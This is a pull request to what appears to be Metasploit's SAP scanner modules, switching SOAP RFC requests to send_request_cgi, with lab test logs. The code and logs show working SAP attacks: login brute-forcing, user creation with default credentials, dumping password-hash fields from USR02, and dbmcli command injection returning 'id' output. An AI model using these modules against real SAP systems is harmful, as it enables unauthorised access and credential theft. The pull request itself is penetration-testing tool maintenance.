### PR TITLE
Fix SAP modules, mainly to make a better use of send_request_cgi

### DIFF
--- a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb
+++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb
@@ -15,7 +15,7 @@ class Metasploit4 < Msf::Auxiliary
 
 	def initialize
 		super(
-			'Name'         => 'SAP Management Console ABAP syslog',
+			'Name'         => 'SAP Management Console ABAP Syslog Disclosure',
 			'Description'  => %q{ This module simply attempts to extract the ABAP syslog through the SAP Management Console SOAP Interface. },
 			'References'   =>
 				[
@@ -106,7 +106,7 @@ class Metasploit4 < Msf::Auxiliary
 		if success
 			print_status("#{rhost}:#{rport} [SAP] ABAP syslog downloading")
 			print_status("#{rhost}:#{rport} [SAP] Storing looted SAP ABAP syslog XML file")
-			store_loot(
+			path = store_loot(
 				"sap.abap.syslog",
 				"text/xml",
 				rhost,
@@ -114,7 +114,7 @@ class Metasploit4 < Msf::Auxiliary
 				"sap_abap_syslog.xml",
 				"SAP ABAP syslog"
 			)
-
+			print_good("#{rhost}:#{rport} [SAP] SAP ABAP syslog XML file stored at #{path}")
 		elsif fault
 			print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
 			return

--- a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
@@ -70,21 +70,20 @@ class Metasploit4 < Msf::Auxiliary
 		data << '</n1:BAPI_USER_CREATE1>'
 		data << '</env:Body>'
 		data << '</env:Envelope>'
-		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
 		begin
 			print_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}'")
-			res = send_request_raw({
+			res = send_request_cgi({
 				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
 				'method' => 'POST',
 				'data' => data,
-				'headers' =>{
-					'Content-Length' => data.size.to_s,
-					'SOAPAction'     => 'urn:sap-com:document:sap:rfc:functions',
-					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-					'Authorization'  => 'Basic ' + user_pass,
-					'Content-Type'   => 'text/xml; charset=UTF-8'
+				'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+				'ctype' => 'text/xml; charset=UTF-8',
+				'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+				'headers' =>
+					{
+						'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
 					}
-				}, 45)
+			})
 			if res and res.code == 200
 				if res.body =~ /<h1>Logon failed<\/h1>/
 					print_error("[SAP] #{ip}:#{rport} - Logon failed")

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb
@@ -118,19 +118,19 @@ class Metasploit4 < Msf::Auxiliary
 		data << '</n1:RFC_PING>'
 		data << '</env:Body>'
 		data << '</env:Envelope>'
-		user_pass = Rex::Text.encode_base64(username+ ":" + password)
 		begin
-			res = send_request_raw({
+			res = send_request_cgi({
 				'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN',
 				'method' => 'POST',
 				'data' => data,
-				'headers' =>{
-					'Content-Length' => data.size.to_s,
-					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
-					'Authorization' => 'Basic ' + user_pass,
-					'Content-Type' => 'text/xml; charset=UTF-8'}
-					}, 45)
+				'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
+				'ctype' => 'text/xml; charset=UTF-8',
+				'authorization' => basic_auth(username, password),
+				'headers' =>
+					{
+						'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+					}
+			})
 			if res and res.code == 200
 				report_auth_info(
 					:host => rhost,

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb
@@ -92,22 +92,19 @@ class Metasploit4 < Msf::Auxiliary
 	end
 
 	def exec_command(ip,data)
-		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
 		print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_CALL_SYSTEM request")
 		begin
-			res = send_request_raw(
-				{
-					'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
-					'method' => 'POST',
-					'data' => data,
-					'headers' => {
-						'Content-Length' => data.size.to_s,
-						'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-						'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-						'Authorization' => 'Basic ' + user_pass,
-						'Content-Type' => 'text/xml; charset=UTF-8'
-						}
-				}, 45)
+			res = send_request_cgi({
+				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+				'method' => 'POST',
+				'data' => data,
+				'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+				'ctype' => 'text/xml; charset=UTF-8',
+				'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+				'headers' =>{
+					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+				}
+			})
 			if res and res.code != 500 and res.code != 200
 				print_error("[SAP] #{ip}:#{rport} - something went wrong!")
 				return

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb
@@ -73,7 +73,7 @@ class Metasploit4 < Msf::Auxiliary
 			if num == 1
 				command = '-o c:\\\pwn.out -n pwnsap' + "\r\n!"
 				space = "%programfiles:~10,1%"
-				command << datastore['COMMAND'].gsub(" ",space)
+				command << datastore['CMD'].gsub(" ",space)
 			end
 			command = '-ic c:\\\pwn.out' if num == 2
 		end

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb
@@ -74,7 +74,7 @@ class Metasploit4 < Msf::Auxiliary
 			if num == 1
 				command = '-o c:\\\pwn.out -n pwnsap' + "\r\n!"
 				space = "%programfiles:~10,1%"
-				command << datastore['COMMAND'].gsub(" ",space)
+				command << datastore['CMD'].gsub(" ",space)
 			end
 			command = '-ic c:\\\pwn.out' if num == 2
 		end

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb
@@ -93,22 +93,19 @@ class Metasploit4 < Msf::Auxiliary
 	end
 
 	def exec_command(ip,data)
-		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
 		print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
 		begin
-			res = send_request_raw(
-				{
-					'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
-					'method' => 'POST',
-					'data' => data,
-					'headers' => {
-						'Content-Length' => data.size.to_s,
-						'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-						'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-						'Authorization' => 'Basic ' + user_pass,
-						'Content-Type' => 'text/xml; charset=UTF-8'
-						}
-				}, 45)
+			res = send_request_cgi({
+				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+				'method' => 'POST',
+				'data' => data,
+				'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+				'ctype' => 'text/xml; charset=UTF-8',
+				'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+				'headers' =>{
+					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+				}
+			})
 			if res
 				if res.code != 500 and res.code != 200
 					print_error("[SAP] #{ip}:#{rport} - something went wrong!")

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb
@@ -61,22 +61,20 @@ class Metasploit4 < Msf::Auxiliary
 		data << '</n1:RFC_PING>'
 		data << '</env:Body>'
 		data << '</env:Envelope>'
-		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
 		print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_PING request")
 		begin
-			res = send_request_raw({
+			res = send_request_cgi({
 				'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN',
 				'method' => 'POST',
+				'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
 				'data' => data,
+				'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+				'ctype'  => 'text/xml; charset=UTF-8',
 				'headers' =>
 					{
-						'Content-Length' => data.size.to_s,
-						'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-						'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
-						'Authorization'  => 'Basic ' + user_pass,
-						'Content-Type'   => 'text/xml; charset=UTF-8'
+						'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'
 					}
-				}, 45)
+				})
 			if res and res.code != 500 and res.code != 200
 				if res and res.body =~ /<h1>Logon failed<\/h1>/
 					print_error("[SAP] #{ip}:#{rport} - login failed!")

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb
@@ -49,8 +49,8 @@ class Metasploit4 < Msf::Auxiliary
 				OptString.new('CLIENT', [true, 'SAP client', '001']),
 				OptString.new('USERNAME', [true, 'Username', 'SAP*']),
 				OptString.new('PASSWORD', [true, 'Password', '06071992']),
-				OptString.new('TABLE', [true, 'Table to read', nil]),
-				OptString.new('FIELDS', [true, 'Fields to read', '*'])
+				OptString.new('TABLE', [true, 'Table to read', 'USR02']),
+				OptString.new('FIELDS', [true, 'Fields to read', 'BNAME,BCODE'])
 			], self.class)
 	end
 
@@ -82,21 +82,22 @@ class Metasploit4 < Msf::Auxiliary
 		data << '</n1:RFC_READ_TABLE>'
 		data << '</env:Body>'
 		data << '</env:Envelope>'
-		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
 		print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_READ_TABLE request")
 		begin
-			res = send_request_raw({
+			res = send_request_cgi({
 				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
 				'method' => 'POST',
 				'data' => data,
+				'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+				'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+				'ctype' => 'text/xml; charset=UTF-8',
 				'headers' =>{
-					'Content-Length' => data.size.to_s,
 					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-					'Authorization' => 'Basic ' + user_pass,
-					'Content-Type' => 'text/xml; charset=UTF-8'
+					#'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+					#'Authorization' => 'Basic ' + user_pass,
+					#'Content-Type' =>
 					}
-				}, 45)
+				})
 			if res and res.code != 500 and res.code != 200
 				# to do - implement error handlers for each status code, 404, 301, etc.
 				if res.body =~ /<h1>Logon failed<\/h1>/

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb
@@ -70,7 +70,7 @@ class Metasploit4 < Msf::Auxiliary
 		data << '</env:Envelope>'
 
 		begin
-			print_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}'")
+			vprint_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}'")
 			res = send_request_cgi({
 				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
 				'method' => 'POST',
@@ -85,25 +85,28 @@ class Metasploit4 < Msf::Auxiliary
 				})
 			if res and res.code == 200
 				if res.body =~ /<h1>Logon failed<\/h1>/
-					print_error("[SAP] #{ip}:#{rport} - Logon failed")
+					vprint_error("[SAP] #{ip}:#{rport} - Logon failed")
 					return
 				elsif res.body =~ /faultstring/
 					error = []
 					error = [ res.body.scan(%r{(.*?)}) ]
-					print_error("[SAP] #{ip}:#{rport} - #{error.join.chomp}")
+					vprint_error("[SAP] #{ip}:#{rport} - #{error.join.chomp}")
 					return
 				else
 					print_good("[SAP] #{ip}:#{rport} - User '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}' created")
 					return
 				end
+			elsif res and res.code == 500 and res.body =~ /USER_ALLREADY_EXISTS/
+				vprint_error("[SAP] #{ip}:#{rport} - user already exists")
+				return
 			else
-				print_error("[SAP] #{ip}:#{rport} - Unknown error")
-				print_error("[SAP] #{ip}:#{rport} - Error code: " + res.code) if res
-				print_error("[SAP] #{ip}:#{rport} - Error message: " + res.message) if res
+				vprint_error("[SAP] #{ip}:#{rport} - Unknown error")
+				vprint_error("[SAP] #{ip}:#{rport} - Error code: " + res.code) if res
+				vprint_error("[SAP] #{ip}:#{rport} - Error message: " + res.message) if res
 				return
 			end
 		rescue ::Rex::ConnectionError
-			print_error("[SAP] #{rhost}:#{rport} - Unable to connect")
+			vprint_error("[SAP] #{rhost}:#{rport} - Unable to connect")
 			return
 		end
 	end

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb
@@ -68,42 +68,43 @@ class Metasploit4 < Msf::Auxiliary
 		data << '</n1:SUSR_RFC_USER_INTERFACE>'
 		data << '</env:Body>'
 		data << '</env:Envelope>'
-		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+
 		begin
 			print_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}'")
-			res = send_request_raw({
+			res = send_request_cgi({
 				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
 				'method' => 'POST',
 				'data' => data,
-				'headers'  =>{
-					'Content-Length' => data.size.to_s,
-					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-					'Authorization' => 'Basic ' + user_pass,
-					'Content-Type' => 'text/xml; charset=UTF-8'}
-					}, 45)
-				if res and res.code == 200
-					if res.body =~ /<h1>Logon failed<\/h1>/
-						print_error("[SAP] #{ip}:#{rport} - Logon failed")
-						return
-					elsif res.body =~ /faultstring/
-						error = []
-						error = [ res.body.scan(%r{(.*?)}) ]
-						print_error("[SAP] #{ip}:#{rport} - #{error.join.chomp}")
-						return
-					else
-						print_good("[SAP] #{ip}:#{rport} - User '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}' created")
-						return
-					end
+				'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+				'ctype' => 'text/xml; charset=UTF-8',
+				'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+				'headers'  =>
+					{
+						'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'
+					}
+				})
+			if res and res.code == 200
+				if res.body =~ /<h1>Logon failed<\/h1>/
+					print_error("[SAP] #{ip}:#{rport} - Logon failed")
+					return
+				elsif res.body =~ /faultstring/
+					error = []
+					error = [ res.body.scan(%r{(.*?)}) ]
+					print_error("[SAP] #{ip}:#{rport} - #{error.join.chomp}")
+					return
 				else
-					print_error("[SAP] #{ip}:#{rport} - Unknown error")
-					print_error("[SAP] #{ip}:#{rport} - Error code: " + res.code) if res
-					print_error("[SAP] #{ip}:#{rport} - Error message: " + res.message) if res
+					print_good("[SAP] #{ip}:#{rport} - User '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}' created")
 					return
 				end
-			rescue ::Rex::ConnectionError
-				print_error("[SAP] #{rhost}:#{rport} - Unable to connect")
+			else
+				print_error("[SAP] #{ip}:#{rport} - Unknown error")
+				print_error("[SAP] #{ip}:#{rport} - Error code: " + res.code) if res
+				print_error("[SAP] #{ip}:#{rport} - Error message: " + res.message) if res
 				return
 			end
+		rescue ::Rex::ConnectionError
+			print_error("[SAP] #{rhost}:#{rport} - Unable to connect")
+			return
 		end
 	end
+end

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb
@@ -49,7 +49,7 @@ class Metasploit4 < Msf::Auxiliary
 				OptString.new('CLIENT', [true, 'SAP Client', '001']),
 				OptString.new('USERNAME', [true, 'Username', 'SAP*']),
 				OptString.new('PASSWORD', [true, 'Password', '06071992']),
-				OptString.new('CMD', [true, 'SM69 command to be executed', nil]),
+				OptString.new('CMD', [true, 'SM69 command to be executed', 'PING']),
 				OptString.new('PARAM', [false, 'Additional parameters for the SM69 command', nil]),
 				OptEnum.new('OS', [true, 'SM69 Target OS','ANYOS',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']])
 			], self.class)
@@ -72,21 +72,19 @@ class Metasploit4 < Msf::Auxiliary
 		data << '</n1:SXPG_CALL_SYSTEM>'
 		data << '</env:Body>'
 		data << '</env:Envelope>'
-		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
 		print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
 		begin
-			res = send_request_raw({
+			res = send_request_cgi({
 				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
 				'method' => 'POST',
 				'data' => data,
+				'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+				'ctype' => 'text/xml; charset=UTF-8',
+				'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
 				'headers' =>{
-					'Content-Length' => data.size.to_s,
 					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-					'Authorization' => 'Basic ' + user_pass,
-					'Content-Type' => 'text/xml; charset=UTF-8'
 					}
-				}, 45)
+				})
 			if res and res.code != 500 and res.code != 200
 				# to do - implement error handlers for each status code, 404, 301, etc.
 				print_error("[SAP] #{ip}:#{rport} - something went wrong!")

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
@@ -49,7 +49,7 @@ class Metasploit4 < Msf::Auxiliary
 				OptString.new('CLIENT', [true, 'SAP Client', '001']),
 				OptString.new('USERNAME', [true, 'Username', 'SAP*']),
 				OptString.new('PASSWORD', [true, 'Password', '06071992']),
-				OptString.new('CMD', [true, 'SM69 command to be executed', nil]),
+				OptString.new('CMD', [true, 'SM69 command to be executed', 'PING']),
 				OptString.new('PARAM', [false, 'Additional parameters for the SM69 command', nil]),
 				OptEnum.new('OS', [true, 'SM69 Target OS','ANYOS',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']])
 			], self.class)
@@ -72,21 +72,19 @@ class Metasploit4 < Msf::Auxiliary
 		data << '</n1:SXPG_COMMAND_EXECUTE>'
 		data << '</env:Body>'
 		data << '</env:Envelope>'
-		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
 		print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
 		begin
-			res = send_request_raw({
+			res = send_request_cgi({
 				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
 				'method' => 'POST',
 				'data' => data,
+				'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+				'ctype' => 'text/xml; charset=UTF-8',
+				'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
 				'headers' =>{
-					'Content-Length' => data.size.to_s,
 					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-					'Authorization' => 'Basic ' + user_pass,
-					'Content-Type' => 'text/xml; charset=UTF-8'
-					}
-				}, 45)
+				}
+			})
 			if res and res.code != 500 and res.code != 200
 				# to do - implement error handlers for each status code, 404, 301, etc.
 				print_error("[SAP] #{ip}:#{rport} - something went wrong!")

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb
@@ -88,22 +88,19 @@ class Metasploit4 < Msf::Auxiliary
 		data << '</n1:RFC_SYSTEM_INFO>'
 		data << '</env:Body>'
 		data << '</env:Envelope>'
-		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
 		print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_SYSTEM_INFO request")
 		begin
-			res = send_request_raw({
-				'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN',
+			res = send_request_cgi({
+				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
 				'method' => 'POST',
 				'data' => data,
-				'headers' =>
-					{
-						'Content-Length' => data.size.to_s,
-						'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-						'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
-						'Authorization' => 'Basic ' + user_pass,
-						'Content-Type' => 'text/xml; charset=UTF-8'
-					}
-				}, 45)
+				'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+				'ctype' => 'text/xml; charset=UTF-8',
+				'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+				'headers' =>{
+					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+				}
+			})
 			if res and res.code != 500 and res.code != 200
 				# to do - implement error handlers for each status code, 404, 301, etc.
 				print_error("[SAP] #{ip}:#{rport} - something went wrong!")

--- a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb
@@ -62,23 +62,20 @@ class Metasploit4 < Msf::Auxiliary
 		data << '</env:Body>'
 		data << '</env:Envelope>'
 
-		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
-
 		print_status("[SAP] #{ip}:#{rport} - sending SOAP TH_SAPREL request")
 
 		begin
-			res = send_request_raw({
+			res = send_request_cgi({
 				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
 				'method' => 'POST',
 				'data' => data,
-				'headers'  =>{
-					'Content-Length' => data.size.to_s,
+				'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+				'ctype' => 'text/xml; charset=UTF-8',
+				'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+				'headers' =>{
 					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-					'Authorization' => 'Basic ' + user_pass,
-					'Content-Type' => 'text/xml; charset=UTF-8'
-					}
-				}, 45)
+				}
+			})
 			if res and res.code == 200
 				kern_comp_on = $1 if res.body =~ /<KERN_COMP_ON>(.*)<\/KERN_COMP_ON>/i
 				kern_comp_time = $1 if res.body =~ /<KERN_COMP_TIME>(.*)<\/KERN_COMP_TIME>/i


### PR DESCRIPTION
After being proceeding with testing of the auxiliary/scanner/sap/\* modules, there are some modules, mainly trying to speak with /sap/bc/soap/rfc, which are failing on because of the use of send_request_raw, mainly because the Content-Length header is sent twice which results in a 400 error response. The error could be  due to the last changes around the http libs, or maybe just to some type of SAP weird behavior. Anyway attaching test for the modified modules:
- sap_soap_rfc_ping

```
msf auxiliary(sap_soap_rfc_ping) > reload
[*] Reloading module...
msf auxiliary(sap_soap_rfc_ping) > run

[*] [SAP] 192.168.172.179:8042 - sending SOAP RFC_PING request
[+] [SAP] 192.168.172.179:8042 - RFC service is alive
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
- sap_soap_rfc_read_table

```
msf auxiliary(sap_soap_rfc_read_table) > run

[*] [SAP] 192.168.172.179:8042 - sending SOAP RFC_READ_TABLE request
[*] [SAP] 192.168.172.179:8042 - got response

[SAP] RFC_READ_TABLE
====================

   Returned Data
   -------------
   ADMIN       hidden
   ADSUSER     | hidden
   ADS_AGENT   | hidden
   DDIC        | hidden
   DEVELOPER   | hidden
   J2EE_ADMIN  | hidden
   J2EE_GUEST  | hidden
   ROOT        | hidden
   SAP*        | hidden
   SAPCPIC     | hidden
   SAPJSF      | hidden
   TOOR        | hidden

[+] [SAP] 192.168.172.179:8042 - Data stored in /Users/juan/.msf4/loot/20130501124759_default_192.168.172.179_sap.tables.data_715747.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
- sap_soap_rfc_susr_rfc_user_interface

```
msf auxiliary(sap_soap_rfc_susr_rfc_user_interface) > run

[*] [SAP] 192.168.172.179:8042 - Attempting to create user 'MSF' with password 'msf1234'
[+] [SAP] 192.168.172.179:8042 - User 'MSF' with password 'msf1234' created
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
- sap_soap_rfc_sxpg_call_system_exec

```
msf auxiliary(sap_soap_rfc_sxpg_call_system_exec) > run

[*] [SAP] 192.168.172.179:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] [SAP] 192.168.172.179:8042 - got response

[SAP] SXPG_CALL_SYSTEM 
=======================

   Output
   ------
               [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
               [-M mtu discovery hint] [-S sndbuf]
               [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
   External program terminated with exit code 2
   Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
- sap_soap_rfc_sxpg_command_exec

```
msf auxiliary(sap_soap_rfc_sxpg_command_exec) > run

[*] [SAP] 192.168.172.179:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] [SAP] 192.168.172.179:8042 - got response

[SAP] SXPG_COMMAND_EXECUTE 
===========================

   Output
   ------
               [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
               [-M mtu discovery hint] [-S sndbuf]
               [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
   External program terminated with exit code 2
   Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
- sap_soap_rfc_system_info

```
msf auxiliary(sap_soap_rfc_system_info) > run

[*] [SAP] 192.168.172.179:8042 - sending SOAP RFC_SYSTEM_INFO request
[*] [SAP] 192.168.172.179:8042 - Response received

[SAP] SOAP RFC_SYSTEM_INFO
==========================

   Key                                    Value
   ---                                    -----
   Central Database System:               ADABAS D
   Character Set:                         4103
   Database Host:                         NPLHOST
   Float Type Format:                     IEEE
   Hostname:                              nplhost
   IPv4 Address:                          192.168.234.42
   IPv6 Address:                          192.168.234.42
   Integer Format:                        Little Endian
   Kernel Release:                        720
   Machine ID:                            390
   Operating System:                      Linux
   RFC Destination:                       nplhost_NPL_42
   RFC Log Version:                       011
   Release Status of SAP System:          702
   System ID:                             NPL
   Timezone (diff from UTC in seconds):   0

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
- sap_soap_th_saprel_disclosure

```
msf auxiliary(sap_soap_th_saprel_disclosure) > run

[*] [SAP] 192.168.172.179:8042 - sending SOAP TH_SAPREL request

[SAP] System Info
=================

   Info               Value
   ----               -----
   DB version         SQLDBC 7.8.1.020
   OS Kernel version  Linux GNU SLES-9 x86_64 cc4.1.2 use-pr101108
   SAP Version        720_REL
   SAP compile time   Feb 13 2011 20:27:41
   SAP patch level    80

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
- sap_soap_rfc_dbmcli_sxpg_call_system_command_exec

```
msf auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > run

[*] [SAP] 192.168.172.179:8042 - sending SOAP SXPG_CALL_SYSTEM request
[*] [SAP] 192.168.172.179:8042 - got response
[*] [SAP] 192.168.172.179:8042 - sending SOAP SXPG_CALL_SYSTEM request
[*] [SAP] 192.168.172.179:8042 - got response

[SAP] SXPG_CALL_SYSTEM dbmcli Command Injection
===============================================

   Output
   ------
   >;!id
   uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)

[*] Scanned 1 of 1 hosts (100% complete)
